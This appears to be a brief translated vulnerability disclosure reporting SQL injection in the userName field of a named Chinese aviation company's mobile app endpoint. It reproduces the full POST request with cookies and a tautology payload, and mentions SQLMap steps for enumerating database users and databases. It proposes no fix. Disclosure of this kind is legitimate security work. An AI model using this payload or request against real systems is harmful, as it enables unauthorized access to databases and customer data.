An injection of a Chinese civil aviation product found in the official APP of okai Aviation
SQL Injection for APP security
Objective: To launch okai official APP
Check that SQL Injection exists in the following places: (userName in POST)
POST https://app.travelsky.com/ad//webService/message/house.action HTTP/1.1param: 2f554f71c0a145vs9ag496ng3e2dfContent-Length: 73Content-Type: text/plain; charset=utf-8Host: app.travelsky.comConnection: Keep-AliveUser-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; zh-cn; X9180 Build/KVT49L) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1Cookie: Webtrends=14.155.26.106.1453434535415618Cookie2: $Version=1Accept-Encoding: gzip{"newsId":"20160122564629","operateType":"2","userName":"[email protected]"}
Payload:
POST https://app.travelsky.com/ad//webService/message/house.action HTTP/1.1param: 2f554f71c0a145vs9ag496ng3e2dfContent-Length: 73Content-Type: text/plain; charset=utf-8Host: app.travelsky.comConnection: Keep-AliveUser-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; zh-cn; X9180 Build/KVT49L) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1Cookie: Webtrends=14.155.26.106.1453434535415618Cookie2: $Version=1Accept-Encoding: gzip{"newsId":"20160122564629","operateType":"2","userName":"[email protected]' or 1=1 and 1=1 -- -"}
1. SQLMap vulnerability proof
2. List current database users
3. list all databases
Solution:
Please kindly advise ~